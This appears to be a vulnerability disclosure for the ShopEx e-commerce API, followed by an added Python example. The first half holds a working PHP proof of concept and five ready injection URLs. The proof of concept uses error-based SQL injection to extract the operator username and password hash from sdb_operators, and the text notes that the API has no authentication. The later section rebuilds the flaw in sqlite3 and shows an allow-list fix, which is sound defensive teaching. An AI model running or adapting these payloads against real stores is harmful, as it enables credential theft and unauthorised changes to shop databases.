Line 44: $data['columns'] is not filtered, which leads to injection.

PoC (PHP). The injected "columns" value rides on the MySQL duplicate-key error trick (count(*), floor(rand(0)*2), group by) to pull the first operator's username and password hash out of sdb_operators:

<?php
set_time_limit(0);
echo 'Test: http://localhost:808'."\r\n";

// POST body: "columns" is spliced straight into the SELECT list, so the
// subselect on sdb_operators runs and its result is folded into a group-by
// key that collides, leaking username|userpass through the duplicate-entry error.
$sql = 'columns=* from sdb_payment_cfg WHERE 1 and (select 1 from(select count(*),concat((select (select (SELECT concat(username,0x7c,userpass) FROM sdb_operators limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#&disabled=1';
$url = 'http://localhost:808/api.php?act=search_payment_cfg_list&api_version=2.0';

$ch = curl_init();
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POSTFIELDS, $sql);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$data = curl_exec($ch);   // if the API echoes the MySQL error, the leaked value is in here
echo $data;
curl_close($ch);
?>

One more thing: ShopEx's API module performs no authentication at all. Any user can reach it, so an attacker can use it to add, delete and modify product categories, types, specifications, brands and so on, and where the parameters are not filtered properly it also yields injection.
Injection 1:
http://www.0day5.com/api.php POST act=search_sub_regions&api_version=1.0&return_data=string&p_region_id=22 and (select 1 from(select count(*),concat(0x7c,(select (Select version()) from information_schema.tables limit 0,1),0x7c,floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)#

Injection 2:
http://www.0day5.com/shopex/api.php act=add_category&api_version=3.1&datas={"name":"name' and 1=x %23"}

Injection 3:
http://www.0day5.com/shopex/api.php act=get_spec_single&api_version=3.1&spec_id=1 xxx

Injection 4:
http://www.0day5.com/shopex/api.php act=online_pay_center&api_version=1.0&order_id=1x&pay_id=1&currency=1

Injection 5:
http://www.0day5.com/shopex/api.php act=search_dly_h_area&return_data=string&columns=xxxxx
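Added example, not ShopEx's code and not from the original post: a hypothetical reconstruction in Python with sqlite3 of the pattern behind the line-44 finding and injection 5, where a caller-supplied "columns" string is spliced into the SELECT list, placed beside a hardened handler that allow-lists each requested column against the table's real column names and binds "disabled" as an integer. Only the table names sdb_payment_cfg and sdb_operators come from the post; the column names and rows are constructed sample data, and the MySQL-only duplicate-key trick is replaced by a plain scalar subquery, since that is enough to show the leak in SQLite.

```python
import sqlite3

# Constructed sample schema standing in for the two ShopEx tables the post names;
# the column names and rows are made up for this example.
SCHEMA = """
CREATE TABLE sdb_payment_cfg (id INTEGER PRIMARY KEY, app_id TEXT, disabled INTEGER);
CREATE TABLE sdb_operators   (op_id INTEGER PRIMARY KEY, username TEXT, userpass TEXT);
INSERT INTO sdb_payment_cfg VALUES (1, 'alipay', 0), (2, 'tenpay', 1);
INSERT INTO sdb_operators   VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
"""

# Same shape as the post's payload (a subselect on sdb_operators smuggled in
# through "columns"), but the MySQL-only duplicate-key trick (count(*),
# floor(rand(0)*2), group by) is replaced by a scalar subquery; the trailing
# "--" comments out whatever the handler appends after the column list.
INJECTED_COLUMNS = (
    "*, (SELECT username || '|' || userpass FROM sdb_operators LIMIT 1) AS leaked "
    "FROM sdb_payment_cfg WHERE 1 --"
)


def open_db():
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def search_payment_cfg_vulnerable(con, columns, disabled):
    """Hypothetical reconstruction of the flawed pattern: both request values
    are concatenated into the SQL text, as a PHP string build would do."""
    sql = "SELECT %s FROM sdb_payment_cfg WHERE disabled = %s" % (columns, disabled)
    return con.execute(sql).fetchall()


def search_payment_cfg_hardened(con, columns, disabled):
    """Allow-list every requested column against the table's real columns and
    bind the integer parameter instead of splicing it into the query."""
    allowed = {row[1] for row in con.execute("PRAGMA table_info(sdb_payment_cfg)")}
    requested = [c.strip() for c in columns.split(",")]
    for col in requested:
        if col != "*" and col not in allowed:
            raise ValueError("rejected column: %r" % col)
    try:
        disabled = int(disabled)          # "1x" (injection 4 style) is refused here
    except ValueError:
        raise ValueError("disabled must be an integer, got %r" % disabled)
    sql = "SELECT %s FROM sdb_payment_cfg WHERE disabled = ?" % ", ".join(requested)
    return con.execute(sql, (disabled,)).fetchall()


def is_rejected(con, columns, disabled):
    """True when the hardened handler refuses the request."""
    try:
        search_payment_cfg_hardened(con, columns, disabled)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    con = open_db()
    # Vulnerable: every row comes back with an extra "leaked" column holding
    # admin|<hash> pulled from sdb_operators.
    print("vulnerable:", search_payment_cfg_vulnerable(con, INJECTED_COLUMNS, "1"))
    print("hardened, legitimate:", search_payment_cfg_hardened(con, "id, app_id", "1"))
    print("hardened, payload rejected:", is_rejected(con, INJECTED_COLUMNS, "1"))
```

The allow-list is built from PRAGMA table_info at call time so it cannot drift from the schema; a static list of column names would do just as well in the ShopEx handler. Note that the hardened version still cannot bind the column list as a parameter, which is exactly why a column allow-list, not escaping, is the right control for this sink.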